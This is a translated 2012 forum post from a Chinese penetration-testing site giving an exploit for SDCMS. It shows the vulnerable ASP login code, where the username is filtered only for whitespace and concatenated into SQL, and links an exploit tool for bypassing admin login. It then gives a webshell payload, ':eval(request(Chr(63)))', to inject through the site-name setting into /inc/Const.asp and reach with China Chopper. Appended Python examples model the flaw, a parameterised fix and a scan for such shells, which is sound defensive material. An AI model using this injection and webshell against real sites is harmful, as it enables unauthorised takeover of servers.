China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: SDCMS universal vulnerability exploitation tool and privilege escalation to get a SHELL
Author: admin
Time: 2012-11-9 20:57
Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp

Sub Check
Dim username,password,code,getcode,Rs
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
'Both fields go through FilterText in mode 1, which only strips whitespace (see FilterText below)
username=FilterText(Trim(Request.Form("username")),1)
password=FilterText(Trim(Request.Form("password")),1)
code=Trim(Request.Form("yzm"))
getcode=Session("SDCMSCode")
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
IF username="" or password="" Then
    Echo "用户名或密码不能为空":died
Else
    'username is concatenated into the query unescaped; password is hashed before it gets there
    Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
    IF Rs.Eof Then
        AddLog username,GetIp,"登录失败",1
        Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
    Else
        Add_Cookies "sdcms_id",Rs(0)
        Add_Cookies "sdcms_name",username
        Add_Cookies "sdcms_pwd",Rs(2)
        Add_Cookies "sdcms_admin",Rs(3)
        Add_Cookies "sdcms_alllever",Rs(4)
        Add_Cookies "sdcms_infolever",Rs(5)
        Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
        AddLog username,GetIp,"登录成功",1
        'Automatically delete log records older than 30 days
        IF Sdcms_DataType Then
            Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
        Else
            Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
        End IF
        Go("sdcms_index.asp")
    End IF
    Rs.Close
    Set Rs=Nothing
End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
'Mode "1" strips only whitespace, mode "2" strips control characters and punctuation, anything else HTML-encodes
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
t0=Trim(t0)
Select Case t1
    Case "1"
        t0=Replace(t0,Chr(32),"")
        t0=Replace(t0,Chr(13),"")
        t0=Replace(t0,Chr(10)&Chr(10),"")
        t0=Replace(t0,Chr(10),"")
    Case "2"
        t0=Replace(t0,Chr(8),"")'backspace
        t0=Replace(t0,Chr(9),"")'tab (horizontal tab)
        t0=Replace(t0,Chr(10),"")'line feed
        t0=Replace(t0,Chr(11),"")'vertical tab
        t0=Replace(t0,Chr(12),"")'form feed
        t0=Replace(t0,Chr(13),"")'carriage return; chr(13)&chr(10) is the CR+LF combination
        t0=Replace(t0,Chr(22),"")
        t0=Replace(t0,Chr(32),"")'space
        t0=Replace(t0,Chr(33),"")'!
        t0=Replace(t0,Chr(34),"")'"
        t0=Replace(t0,Chr(35),"")'#
        t0=Replace(t0,Chr(36),"")'$
        t0=Replace(t0,Chr(37),"")'%
        t0=Replace(t0,Chr(38),"")'&
        t0=Replace(t0,Chr(39),"")''
        t0=Replace(t0,Chr(40),"")'(
        t0=Replace(t0,Chr(41),"")')
        t0=Replace(t0,Chr(42),"")'*
        t0=Replace(t0,Chr(43),"")'+
        t0=Replace(t0,Chr(44),"")',
        t0=Replace(t0,Chr(45),"")'-
        t0=Replace(t0,Chr(46),"")'.
        t0=Replace(t0,Chr(47),"")'/
        t0=Replace(t0,Chr(58),"")':
        t0=Replace(t0,Chr(59),"")';
        t0=Replace(t0,Chr(60),"")'<
        t0=Replace(t0,Chr(61),"")'=
        t0=Replace(t0,Chr(62),"")'>
        t0=Replace(t0,Chr(63),"")'?
        t0=Replace(t0,Chr(64),"")'@
        t0=Replace(t0,Chr(91),"")'[
        t0=Replace(t0,Chr(92),"")'\
        t0=Replace(t0,Chr(93),"")']
        t0=Replace(t0,Chr(94),"")'^
        t0=Replace(t0,Chr(95),"")'_
        t0=Replace(t0,Chr(96),"")'`
        t0=Replace(t0,Chr(123),"")'{
        t0=Replace(t0,Chr(124),"")'|
        t0=Replace(t0,Chr(125),"")'}
        t0=Replace(t0,Chr(126),"")'~
    Case Else
        'HTML-encode; the entities were decoded in the extracted page and are restored here
        t0=Replace(t0, "&", "&amp;")
        t0=Replace(t0, "'", "&#39;")
        t0=Replace(t0, """", "&quot;")
        t0=Replace(t0, "<", "&lt;")
        t0=Replace(t0, ">", "&gt;")
End Select
'Break the CSS "expression" keyword: the replacement has a soft hyphen (U+00AD) between "e" and "xpression"
IF Instr(Lcase(t0),"expression")>0 Then
    t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
End If
FilterText=t0
End Function
See that? With parameter 1 it only filters:

t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
This vulnerability makes it possible to obtain the backend account and password directly. The default SDCMS backend path is /admin/; if the webmaster changed the backend path, find it yourself!

EXP tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the captcha shown in the tool and click OK.

See, we went straight into the backend management interface, haha!

Straight into the backend like this....
SDCMS privilege escalation:

Method 1: Visit /<admin directory>/sdcms_set.asp and, after the site name (网站名称:) field, append ":eval(request(Chr(63)))' and that is it; this writes a one-line shell straight in. It is written into /inc/Const.asp, and the one-liner connection password is ? (Chr(63) is the question mark).

OK, now connect with Caidao (China Chopper)!
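As an added example (not SDCMS's own code), a Python model of the login path shown above: FilterText mode 1 followed by the concatenated query from Sub Check, beside the same lookup with bound parameters. The Sd_Admin table, its single row and the md5 of "password" are constructed sample data.

```python
import hashlib
import sqlite3

# Added example, not SDCMS code: models FilterText(t0,1) and the login query in
# Sub Check, next to a parameterised version. Sd_Admin below is a constructed stand-in.
MODE1_TOKENS = ["\x20", "\x0d", "\x0a\x0a", "\x0a"]  # Chr(32), Chr(13), Chr(10)&Chr(10), Chr(10)

def filter_text_mode1(value: str) -> str:
    """Model of FilterText(t0, 1): whitespace is removed, quotes and SQL keywords survive."""
    if not value:
        return ""
    for token in MODE1_TOKENS:
        value = value.replace(token, "")
    return value

def login_sql_concat(username: str, pwd_md5: str) -> str:
    """The string handed to Conn.Execute in the post (shorter column list, same structure)."""
    return ("Select Id,Sdcms_Name,Sdcms_Pwd From Sd_Admin Where Sdcms_name='"
            + filter_text_mode1(username) + "' And Sdcms_Pwd='" + pwd_md5 + "'")

def login_concat(conn: sqlite3.Connection, username: str, pwd_md5: str):
    """Vulnerable lookup: a quote in username reaches the SQL parser; returns the error text then."""
    try:
        return conn.execute(login_sql_concat(username, pwd_md5)).fetchone()
    except sqlite3.OperationalError as exc:
        return "SQL error: " + str(exc)

def login_param(conn: sqlite3.Connection, username: str, pwd_md5: str):
    """Hardened lookup: bound parameters, so the same username is compared as plain data."""
    return conn.execute(
        "Select Id,Sdcms_Name,Sdcms_Pwd From Sd_Admin Where Sdcms_name=? And Sdcms_Pwd=?",
        (filter_text_mode1(username), pwd_md5),
    ).fetchone()

def sample_pwd_md5() -> str:
    """md5(password) as the ASP does; 'password' is only a constructed sample value."""
    return hashlib.md5(b"password").hexdigest()

def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for Sd_Admin with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("Create Table Sd_Admin(Id Integer, Sdcms_Name Text, Sdcms_Pwd Text)")
    conn.execute("Insert Into Sd_Admin Values(1, 'admin', ?)", (sample_pwd_md5(),))
    return conn

if __name__ == "__main__":
    db = demo_db()
    print(login_concat(db, "ad'min", sample_pwd_md5()))  # the quote changes the query
    print(login_param(db, "ad'min", sample_pwd_md5()))   # None: no such user, nothing else
```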
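Added example, not SDCMS code, for the sdcms_set.asp write described above: a writer that emits the site name into an ASP include by plain concatenation beside one that doubles embedded double quotes, plus a scan for an existing /inc/Const.asp. The `Const Sdcms_WebName="..."` line format and the sample include are assumptions.

```python
import re

# Added example, not SDCMS code. The post says sdcms_set.asp writes the site name into
# /inc/Const.asp, where a double quote ends the VBScript literal and the rest of the
# line runs as code. The `Const Name="..."` line format below is an assumption.
def const_line_concat(name: str, value: str) -> str:
    """Raw concatenation into an ASP include: whatever follows a '"' in value is code."""
    return 'Const ' + name + '="' + value + '"'

def const_line_escaped(name: str, value: str) -> str:
    """Hardened writer: VBScript escapes a '"' inside a literal by doubling it."""
    return 'Const ' + name + '="' + value.replace('"', '""') + '"'

# A generated line must be one Const with one literal whose inner quotes are all doubled.
ONE_LITERAL = re.compile(r'Const\s+\w+="(?:[^"]|"")*"')

def is_single_literal(line: str) -> bool:
    """Check a generated line before it is written to disk."""
    return ONE_LITERAL.fullmatch(line) is not None

# Integrity check for an existing include: eval/execute over request input has no
# business in a constants file, whatever the rest of the line looks like.
SUSPECT = re.compile(r'\b(eval|execute|executeglobal)\s*\(\s*request\b', re.IGNORECASE)

def scan_include(text: str) -> list:
    """Return the lines of an ASP include that pass request input to eval/execute."""
    return [ln for ln in text.splitlines() if SUSPECT.search(ln)]

# Constructed sample of a tampered include (shape taken from the post, not a real file).
SAMPLE_CONST_ASP = '\n'.join([
    '<%',
    'Const Sdcms_WebName="My Site":eval(request(Chr(63)))\'"',
    'Const Sdcms_WebUrl="http://example.invalid/"',
    '%>',
])

if __name__ == "__main__":
    site_name = 'My Site":eval(request(Chr(63)))\''
    bad = const_line_concat("Sdcms_WebName", site_name)
    good = const_line_escaped("Sdcms_WebName", site_name)
    print(is_single_literal(bad), is_single_literal(good))  # False True
    print(scan_include(SAMPLE_CONST_ASP))
```

scan_include matches on text alone, so a correctly escaped value that happens to contain the same words is also reported; treat a hit as something to review, not as proof of compromise.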
Welcome to China Network Penetration Testing Alliance (http://cobjon.com/)
Powered by Discuz! X3.2